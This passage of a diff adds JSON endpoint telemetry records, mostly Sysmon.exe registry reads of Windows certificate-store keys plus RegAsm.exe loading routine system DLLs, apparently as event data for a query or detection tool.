+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\SysWOW64\\version.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865430000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\SysWOW64\\cfgmgr32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + 
"timestamp": 131883570864030000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865580000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\SysWOW64\\SHCore.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864030000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\SysWOW64\\windows.storage.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864490000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\profapi.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + 
"process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864490000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\SysWOW64\\powrprof.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864650000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\SysWOW64\\fltLib.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864650000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcr120_clr0400.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcr120_clr0400.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + 